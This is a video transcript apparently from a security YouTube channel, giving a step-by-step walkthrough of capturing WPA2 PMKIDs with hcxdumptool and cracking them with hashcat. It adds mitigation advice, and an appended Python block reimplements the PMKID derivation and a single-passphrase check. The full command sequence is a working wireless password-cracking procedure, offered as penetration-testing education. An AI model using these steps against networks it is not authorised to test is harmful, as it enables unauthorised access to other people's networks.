How To Hack WPA2 WIFI with PMKID Method - Are You Safe

Captions
Wi-Fi attack techniques in the past have always been quite a bit noisy and susceptible to detection. However, there's a more recent technique that is almost completely silent, which you or all your clients might be vulnerable to. Today we'll demonstrate just how this attack works. [Music]

Hi and welcome to the channel. If you're new here, please consider subscribing and ringing the bell so you don't miss any future video. Now, to start with an obvious disclaimer: this should only be performed on networks that either you own or that you are consulted or contracted to test. This video is aimed at sharing knowledge to help secure the networks of yourself and your clients, and it should not be used for any malicious activity whatsoever; this is considered illegal.

Now, this method works by leveraging a component that is broadcast within many Wi-Fi networks, and this is the PMKID. This is broadcast by many modern Wi-Fi access points, and if captured, a password hash can actually be extracted and then cracked. Unlike other methods, this does not try to force your way in or drop people's existing connection from their network. This requires very few steps to actually do, but it does require a fair amount of setup, so if you'd like to skip the setup and just see it in action, feel free to jump to that in the chapter sections below in the description.

So now on to what you need. So, for this exercise you will need the following: you'll need a machine running Kali Linux, either virtualized or as a host, it's fine; you'll need an Alfa Wi-Fi adapter or something similar (the one I use is the AWUS036NH, and this is pretty standard in an ethical hacker's toolkit); and lastly you will need a Wi-Fi access point that broadcasts WPA2 and that also broadcasts PMKIDs. There isn't a great way of checking if it does, so it does require a bit of trial and error, but I'd say the majority of them should be doing this by default. So let's go into the tools and dependencies that we'll need to set this up.

So we have a fair bit of setup in the virtual machine to do, and this will be based off the Kali Linux 2020.4 build. First we need to install the Wi-Fi drivers for our Alfa, as these may not already be installed. We do this with apt install firmware-ralink wireless-tools; all these commands will be in the description. Next we need to install three dependencies for the hcx tools that we'll be using: first this is libssl-dev, then we have pkg-config, and then libcurl4-openssl-dev. All these again will be in the description.

Now we need to install hcxtools, which will do most of the work for us. This is divided into two separate git repos: first we have hcxtools and we have hcxdumptool. First we clone it from git, so browse to a folder where you want to install it, do git clone and then this URL, and then cd into that directory once it's cloned, and then do the make command followed by make install. This will compile the application and then install it to your Kali Linux virtual machine. We then do the same for hcxdumptool, so we cd out of that and then install hcxdumptool: we cd into that new directory and issue the make command followed by make install. Now you'll also need hashcat, but this should be installed in your Kali Linux VM by default anyway.

Now everything is installed, we want to check everything is working. Plug in your Wi-Fi adapter and make sure it connects to your VM as a guest and not a host, then type ifconfig to see if your adapter is there. This should be called wlan0 or wlan1; make sure that you're using the correct Wi-Fi adapter if you have multiple installed on your machine. Now all your prerequisites should be complete and we're ready to get started.

So now onto the attack. This attack is quite simple and can be broken down into three main steps. First we need the Wi-Fi adapter to be set to monitor mode. Then we tell the Wi-Fi adapter to capture all the Wi-Fi signals around us and actually save that to a file. Then we convert the file into a file that's compatible with hashcat, which will be the password cracking tool that we'll use in this demonstration.

Step 1: setting the adapter to monitor mode. Okay, so let's get started. We'll start by setting our adapter into monitor mode with airmon-ng start wlan0. Keep in mind wlan0 is my device and it may be named something else on your machine; be sure to check with ifconfig. Now, after we've run that command, if we do ifconfig again we can see the adapter is now named wlan0mon.

Step 2: capturing. Now our adapter is configured correctly, we need to get it to capture all the Wi-Fi signals around it and save them into a file. We do this with hcxdumptool with the following command: hcxdumptool -i wlan0mon, which is our interface, -o test1.pcapng, which is our output file, and then --enable_status=1, which will just display a verbose message to the screen so we can see what happens. Now we can leave this for about five to ten minutes.

Step 3: converting and cracking. I like to keep this running in the background just in case, and I set up a new tab, and this is what I'll use to convert the file. This time we do hcxpcapngtool with the following command: hcxpcapngtool -o test1.txt, being our output, and then test1.pcapng, which is our input file, which was all the packets that we just captured. Now we need to tidy up this output file with a text editor and remove the networks that don't belong to us. First we need to find the network that belongs to us and remove all the others. We do this by getting the last block between the two stars and converting that from ASCII hex to plain text. You can do this in the command line, but I find it quicker just using a web tool. Once we have our target network name, we remove all the other lines from this file, and we also tidy it up by removing the *01*WPA* from the start and the triple star from the end of your line. Now we're ready to crack the password hash using hashcat.

You can do this on your Windows host if you prefer and if you want it to run quicker, but to keep things simple we'll just do it here on Kali. Our command is hashcat -m 16800, which is a hash type, test1.txt, which is our input file, and we also give it the rockyou wordlist. The other options are just there to configure how hashcat runs on your machine; if you don't know, just copy these for yourself. You can also set up hashcat to do a pure brute-force attack or use rules if you prefer; just consult the hashcat documentation to do so. This might take a while depending on your hash rate, but after a while we can see the password hash has been cracked. In our case it's "I love Sydney", which is true.

Firstly I will just disconnect this Wi-Fi adapter from my virtual machine, as I don't have another Wi-Fi adapter on this machine. Next I'll go into the standard Windows networking dialog and connect to the network. We type in the password, I love Sydney, and we're good to go.

So how can we mitigate this attack? Well, fortunately it is pretty simple and kind of an obvious fix. First we need to use strong passwords that aren't susceptible to dictionary attacks or a considerable amount of brute forcing. Also, if your router supports it, we may be able to disable the broadcast of the PMKIDs, and this is usually done by disabling the 802.11 protocol within the access point's firmware.

So, wrapping up, we can see that this attack is relatively simple, and while it may be complicated the first time you go through this process, especially with the setup, it does become quite an effortless attack and one that you can use on your pen test engagements, of course if you have permission. Anyway, if you found this video helpful, be sure to leave it a like, as it helps people like you find content like this. So how did you go with this technique? Are you having trouble? Be sure to let me know in the comments below and we may be able to see if we can sort things out. Also, if you had any success with it, let me know as well. Anyways, I've been Jason from JSON:SEC. Thank you for watching and I'll catch you in the next one.
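Added illustration (not code from the video, nor from the hcxtools or hashcat projects): the Python below shows what is actually inside the file the video hand-edits, and why a captured PMKID is equivalent to a password hash. The PMK and PMKID derivations are the standard IEEE 802.11 ones (PBKDF2-HMAC-SHA1 over the passphrase and SSID, then HMAC-SHA1-128 over "PMK Name", the AP MAC and the client MAC); the network name, MAC addresses and passphrase are constructed sample values. The parser accepts both the `WPA*01*...***` lines hcxpcapngtool writes and the trimmed four-field form the video produces by deleting the prefix and trailing stars, and it performs the hex-to-text ESSID decode the video does with a web tool. The single-candidate check at the end is what hashcat's mode 16800 verifies per guess; its per-guess cost is one PBKDF2 run of 4096 iterations, which is why passphrase entropy, not obscurity, is the mitigation that matters.

```python
import hashlib
import hmac

# Constructed sample values (not from the video): a network name, an access
# point MAC, a client MAC and a passphrase, chosen only to show the derivation.
SAMPLE_ESSID = "ExampleNet"
SAMPLE_AP_MAC = "aabbccddeeff"
SAMPLE_STA_MAC = "112233445566"
SAMPLE_PASSPHRASE = "correct horse battery staple"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).

    These 4096 iterations are the whole per-guess cost an offline cracker pays,
    so a passphrase that survives a dictionary is the effective defence."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: str, sta_mac: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC)."""
    data = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(sta_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def parse_hashcat_line(line: str) -> dict:
    """Parse one line of hcxpcapngtool output.

    Handles the 22000 form   WPA*01*PMKID*APMAC*STAMAC*ESSIDHEX***
    and the trimmed 16800 form   PMKID*APMAC*STAMAC*ESSIDHEX
    that the video produces by editing the prefix and trailing stars away."""
    fields = line.strip().split("*")
    if fields[0] == "WPA":
        if fields[1] != "01":
            raise ValueError("not a PMKID record (type %s)" % fields[1])
        fields = fields[2:6]
    if len(fields) != 4:
        raise ValueError("unexpected field count in line")
    pmkid_hex, ap_mac, sta_mac, essid_hex = fields
    return {
        "pmkid": bytes.fromhex(pmkid_hex),
        "ap_mac": ap_mac.lower(),
        "sta_mac": sta_mac.lower(),
        # The last field is the ESSID as hex; decoding it is the step the
        # video uses to recognise which line belongs to your own network.
        "essid": bytes.fromhex(essid_hex).decode("utf-8", errors="replace"),
    }


def format_hashcat_16800_line(pmkid: bytes, ap_mac: str, sta_mac: str, essid: str) -> str:
    """Write a record back in the four-field form hashcat -m 16800 expects."""
    return "*".join([pmkid.hex(), ap_mac, sta_mac, essid.encode("utf-8").hex()])


def passphrase_matches(passphrase: str, record: dict) -> bool:
    """One candidate check, i.e. what hashcat mode 16800 does for each guess."""
    pmk = derive_pmk(passphrase, record["essid"])
    candidate = derive_pmkid(pmk, record["ap_mac"], record["sta_mac"])
    return hmac.compare_digest(candidate, record["pmkid"])


def build_sample_record() -> dict:
    """Produce a 22000-style line from the constructed values and parse it back."""
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_ESSID)
    pmkid = derive_pmkid(pmk, SAMPLE_AP_MAC, SAMPLE_STA_MAC)
    line_22000 = "WPA*01*%s*%s*%s*%s***" % (
        pmkid.hex(), SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_ESSID.encode("utf-8").hex())
    return parse_hashcat_line(line_22000)


if __name__ == "__main__":
    rec = build_sample_record()
    print("network:", rec["essid"], "pmkid:", rec["pmkid"].hex())
    print("correct passphrase matches:", passphrase_matches(SAMPLE_PASSPHRASE, rec))
    print("wrong passphrase matches:", passphrase_matches("password123", rec))
```

Running the block prints the decoded network name, the PMKID, `True` for the constructed passphrase and `False` for a wrong one. `derive_pmk` can be checked against the published IEEE 802.11 test vector (passphrase "password", SSID "IEEE"), which is a quick way to confirm the derivation before trusting any of the other output.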
Info
Channel: Jason Ford {JSON:SEC}
Views: 28,393
Keywords: hacking, ethical hacking, cracking, wifi, wi-fi, wireless, wifi hacking, wpa hacking, wpa cracking, wpa, wpa2 hacking, wpa2 cracking, fake ap, honeypot, evil twin, mana, mana-toolkit, aircrack-ng, kali, linux, kali linux, zsecurity, fake access point, access point
Id: CfjEqqFmfY4
Length: 10min 1sec (601 seconds)
Published: Mon Jan 18 2021